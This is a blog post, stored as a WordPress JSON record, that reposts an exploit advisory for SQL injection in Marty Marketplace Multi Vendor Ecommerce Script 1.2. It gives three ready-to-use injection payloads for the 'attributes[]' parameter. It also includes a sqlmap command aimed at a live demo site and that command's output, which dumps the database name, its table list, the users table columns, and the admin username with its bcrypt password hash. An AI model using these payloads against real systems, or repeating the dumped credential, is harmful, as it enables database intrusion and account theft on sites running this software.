{"id":28406,"date":"2022-07-25T20:19:11","date_gmt":"2022-07-25T16:19:11","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167796\/mmves12-sql.txt"},"modified":"2022-07-26T14:57:27","modified_gmt":"2022-07-26T10:27:27","slug":"marty-marketplace-multi-vendor-ecommerce-script-1-2-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/marty-marketplace-multi-vendor-ecommerce-script-1-2-sql-injection\/","title":{"rendered":"Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection"},"content":{"rendered":"

\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u2502\u2502 C r a C k E r \u250c\u2518
\n\u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

\u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack…. \u2500\u2500\u2500\u2500\u2510
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 [ Exploits ] \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518
\n: Author : CraCkEr \u2502 \u2502 :
\n\u2502 Website : sangvish.com \u2502 \u2502 \u2502
\n\u2502 Vendor : SangVish Technologies \u2502 \u2502 \u2502
\n\u2502 Software : Marty Marketplace Multi Vendor \u2502 \u2502 Open Source Marketplace PHP script for \u2502
\n\u2502 Ecommerce Script v1.2 \u2502 \u2502 eCommerce marketplace platforms \u2502
\n\u2502 Vuln Type: Remote SQL Injection \u2502 \u2502 in the market \u2502
\n\u2502 Method : GET \u2502 \u2502 \u2502
\n\u2502 Impact : Database Access \u2502 \u2502 \u2502
\n\u2502 \u2502 \u2502 \u2502
\n\u2502\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2502
\n\u2502 B4nks-NET irc.b4nks.tk #unix \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518
\n: :
\n\u2502 Release Notes: \u2502
\n\u2502 \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \u2502
\n\u2502 Typically used for remotely exploitable vulnerabilities that can lead to \u2502
\n\u2502 system compromise. \u2502
\n\u2502 \u2502
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

Greets:
\nPhr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
\nloool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear<\/p>\n

CryptoJob (Twitter) twitter.com\/CryptozJob<\/p>\n

Special Greetz to The Lebanese National Basketball Team for the results of
\nthe FIBA Asia Cup
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 \u00a9 CraCkEr 2022 \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

GET parameter ‘attributes[]’ is vulnerable
\n—
\nParameter: attributes[] (GET)
\nType: boolean-based blind
\nTitle: Boolean-based blind – Parameter replace (original value)
\nPayload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))<\/p>\n

Type: error-based
\nTitle: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
\nPayload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)
\n—<\/p>\n

Demo: https:\/\/demowpthemes.com\/buy2marty\/products?attributes%5B%5D=6<\/p>\n

[+] Starting the Attack<\/p>\n

sqlmap.py -u “https:\/\/demowpthemes.com\/buy2marty\/products?attributes%5B%5D=6” –current-db –batch<\/p>\n

[+] fetching current database<\/p>\n

[INFO] the back-end DBMS is MySQL
\nweb application technology: Apache
\nback-end DBMS: MySQL >= 5.6
\n[INFO] retrieved: ‘garudan_buy2marty’
\ncurrent database: ‘garudan_buy2marty’<\/p>\n

[+] fetching tables for database: ‘garudan_buy2marty’<\/p>\n

Database: garudan_buy2marty
\n[105 tables]\n

+—————————————-+
\n| activations |
\n| ads |
\n| ads_translations |
\n| audit_histories |
\n| categories |
\n| categories_translations |
\n| contact_replies |
\n| contacts |
\n| dashboard_widget_settings |
\n| dashboard_widgets |
\n| ec_brands |
\n| ec_brands_translations |
\n| ec_cart |
\n| ec_currencies |
\n| ec_customer_addresses |
\n| ec_customer_password_resets |
\n| ec_customers |
\n| ec_discount_customers |
\n| ec_discount_product_collections |
\n| ec_discount_products |
\n| ec_discounts |
\n| ec_flash_sale_products |
\n| ec_flash_sales |
\n| ec_flash_sales_translations |
\n| ec_grouped_products |
\n| ec_order_addresses |
\n| ec_order_histories |
\n| ec_order_product |
\n| ec_orders |
\n| ec_product_attribute_sets |
\n| ec_product_attribute_sets_translations |
\n| ec_product_attributes |
\n| ec_product_attributes_translations |
\n| ec_product_categories |
\n| ec_product_categories_translations |
\n| ec_product_category_product |
\n| ec_product_collection_products |
\n| ec_product_collections |
\n| ec_product_collections_translations |
\n| ec_product_cross_sale_relations |
\n| ec_product_label_products |
\n| ec_product_labels |
\n| ec_product_labels_translations |
\n| ec_product_related_relations |
\n| ec_product_tag_product |
\n| ec_product_tags |
\n| ec_product_tags_translations |
\n| ec_product_up_sale_relations |
\n| ec_product_variation_items |
\n| ec_product_variations |
\n| ec_product_with_attribute |
\n| ec_product_with_attribute_set |
\n| ec_products |
\n| ec_products_translations |
\n| ec_reviews |
\n| ec_shipment_histories |
\n| ec_shipments |
\n| ec_shipping |
\n| ec_shipping_rule_items |
\n| ec_shipping_rules |
\n| ec_store_locators |
\n| ec_taxes |
\n| ec_wish_lists |
\n| failed_jobs |
\n| faq_categories |
\n| faq_categories_translations |
\n| faqs |
\n| faqs_translations |
\n| jobs |
\n| language_meta |
\n| languages |
\n| media_files |
\n| media_folders |
\n| media_settings |
\n| menu_locations |
\n| menu_nodes |
\n| menus |
\n| meta_boxes |
\n| migrations |
\n| mp_customer_revenues |
\n| mp_customer_withdrawals |
\n| mp_stores |
\n| mp_vendor_info |
\n| newsletters |
\n| pages |
\n| pages_translations |
\n| password_resets |
\n| payments |
\n| post_categories |
\n| post_tags |
\n| posts |
\n| posts_translations |
\n| revisions |
\n| role_users |
\n| roles |
\n| settings |
\n| simple_slider_items |
\n| simple_sliders |
\n| slugs |
\n| tags |
\n| tags_translations |
\n| translations |
\n| user_meta |
\n| users |
\n| widgets |
\n+—————————————-+<\/p>\n

[+] fetching columns for table ‘users’ in database ‘garudan_buy2marty’<\/p>\n

Database: garudan_buy2marty
\nTable: users
\n[15 columns]\n

+——————-+———————+
\n| Column | Type |
\n+——————-+———————+
\n| avatar_id | int(10) unsigned |
\n| created_at | timestamp |
\n| email | varchar(191) |
\n| email_verified_at | timestamp |
\n| first_name | varchar(191) |
\n| id | bigint(20) unsigned |
\n| last_login | timestamp |
\n| last_name | varchar(191) |
\n| manage_supers | tinyint(1) |
\n| password | varchar(191) |
\n| permissions | text |
\n| remember_token | varchar(100) |
\n| super_user | tinyint(1) |
\n| updated_at | timestamp |
\n| username | varchar(60) |
\n+——————-+———————+<\/p>\n

[+] fetching entries of column(s) ‘id,password,permissions,super_user,username’ for table ‘users’ in database ‘garudan_buy2marty’<\/p>\n

Database: garudan_buy2marty
\nTable: users
\n[1 entry]\n

+—-+———-+————————————————————–+————+————-+
\n| id | username | password | super_user | permissions |
\n+—-+———-+————————————————————–+————+————-+
\n| 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae\/w8KOWAW\/G6qlHRri6XPRW\/2 | 1 | NULL |
\n+—-+———-+————————————————————–+————+————-+
\nPossible algorithms: bcrypt $2*$, Blowfish (Unix)<\/p>\n

[-] Done<\/p>\n","protected":false},"excerpt":{"rendered":"

\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\u2502 C r a C k E r \u250c\u2518 \u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 \u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack…. \u2500\u2500\u2500\u2500\u2510 \u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2518 [ Exploits ] \u250c\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 : Author …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28406","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28406","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28406"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28406\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28406"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28406"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28406"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}